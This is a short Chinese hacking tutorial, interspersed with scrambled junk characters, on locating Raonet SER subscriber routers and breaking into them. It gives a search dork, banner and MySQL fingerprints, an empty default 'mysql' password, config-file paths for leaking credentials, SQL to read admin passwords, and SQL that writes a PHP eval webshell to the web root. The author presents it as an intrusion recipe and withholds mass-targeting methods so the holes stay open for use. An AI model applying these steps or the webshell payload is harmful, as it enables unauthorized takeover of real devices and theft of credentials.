寻找存在漏洞的路由器方法:
& y" a6 b# i7 q4 f" g4 U H7 j6 @8 a! _6 C. m; q1 P' B# L- l
1:google搜索'Raonet Subscriber Ethernet Router'
5 s2 K5 _: C- Z( D g/ X- w. C9 s& G) V4 t6 C6 G; _
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
' g% w' I# ^1 I5 ?
* r R; u8 e% z) V! ?1 H3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
; \9 D5 @% d4 _9 y
: g0 B' q! H' Z0 X8 x//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
9 S1 s3 F1 p8 ~$ X$ v4 y- R
+ x0 q9 i5 w' s2 r
* Y" t: g" G& E3 u4 g$ o! I
# r$ b$ M, z4 ^0 E入侵步骤:' R& X0 E' g5 O" P! E4 [( ~! [! Y
+ v* Z7 U9 Y$ w
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
+ W- C/ S# k+ A2 p" M q! b5 {# ]) Q6 ?1 u
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
2 L; b6 r! E4 k1 i, j) N3:得到密码后连接,查看GUI管理密码:
/ {, R S3 [ @use ser_500- }8 k0 L4 Z/ m# S; {
select id,passwd from user;
( z/ ]1 v# \8 ~3 @- Y1 m4:通过数据库写入webshell,执行命令:
" `+ }/ U9 ^8 }5 }' I ause mysql;
1 m; z& V& Z/ x+ H( u) j9 K# v0 Vcreate table ok(cmd TEXT);
7 E B5 B+ r! q; _6 L/ Ainsert into ok values("<?php @eval($_POST[cmd])?>");7 |/ d; A& w! d
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
( U; D q& G; `drop table ok;
0 c- [# s9 r* u! j2 |5 I7 X9 j* V z2 f* K2 Y
5:连接后门shell.php
& Q6 u& T4 z( |+ V! Y0 Y5 H1 P; B& D8 h5 p: l) w' g5 ]
6. 搞定!/ H6 k# Q4 G. P& o7 K
! Z4 g+ e9 _5 c, X; R/ B |